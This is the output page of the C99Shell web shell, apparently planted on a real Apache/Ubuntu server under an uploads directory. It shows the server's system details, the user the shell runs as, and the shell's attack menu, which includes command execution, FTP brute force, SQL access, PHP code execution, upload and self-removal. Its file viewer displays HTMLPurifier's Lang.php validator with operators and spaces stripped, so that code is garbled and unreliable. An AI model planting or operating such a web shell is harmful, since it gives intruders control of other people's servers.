!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/uploads/script/vendor/ezyang/htmlpurifier/library/HTMLPurifier/AttrDef/   drwxr-xr-x
Free 13.25 GB of 57.97 GB (22.86%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Lang.php (2.38 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * Validates the HTML attribute lang, effectively a language code.
 * @note Built according to RFC 3066, which obsoleted RFC 1766
 */
class HTMLPurifier_AttrDef_Lang extends HTMLPurifier_AttrDef
{

    
/**
     * @param string $string
     * @param HTMLPurifier_Config $config
     * @param HTMLPurifier_Context $context
     * @return bool|string
     */
    
public function validate($string$config$context)
    {
        
$string trim($string);
        if (!
$string) {
            return 
false;
        }

        
$subtags explode('-'$string);
        
$num_subtags count($subtags);

        if (
$num_subtags == 0) { // sanity check
            
return false;
        }

        
// process primary subtag : $subtags[0]
        
$length strlen($subtags[0]);
        switch (
$length) {
            case 
0:
                return 
false;
            case 
1:
                if (!(
$subtags[0] == 'x' || $subtags[0] == 'i')) {
                    return 
false;
                }
                break;
            case 
2:
            case 
3:
                if (!
ctype_alpha($subtags[0])) {
                    return 
false;
                } elseif (!
ctype_lower($subtags[0])) {
                    
$subtags[0] = strtolower($subtags[0]);
                }
                break;
            default:
                return 
false;
        }

        
$new_string $subtags[0];
        if (
$num_subtags == 1) {
            return 
$new_string;
        }

        
// process second subtag : $subtags[1]
        
$length strlen($subtags[1]);
        if (
$length == || ($length == && $subtags[1] != 'x') || $length || !ctype_alnum($subtags[1])) {
            return 
$new_string;
        }
        if (!
ctype_lower($subtags[1])) {
            
$subtags[1] = strtolower($subtags[1]);
        }

        
$new_string .= '-' $subtags[1];
        if (
$num_subtags == 2) {
            return 
$new_string;
        }

        
// process all other subtags, index 2 and up
        
for ($i 2$i $num_subtags$i++) {
            
$length strlen($subtags[$i]);
            if (
$length == || $length || !ctype_alnum($subtags[$i])) {
                return 
$new_string;
            }
            if (!
ctype_lower($subtags[$i])) {
                
$subtags[$i] = strtolower($subtags[$i]);
            }
            
$new_string .= '-' $subtags[$i];
        }
        return 
$new_string;
    }
}

// vim: et sw=4 sts=4

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0052 ]--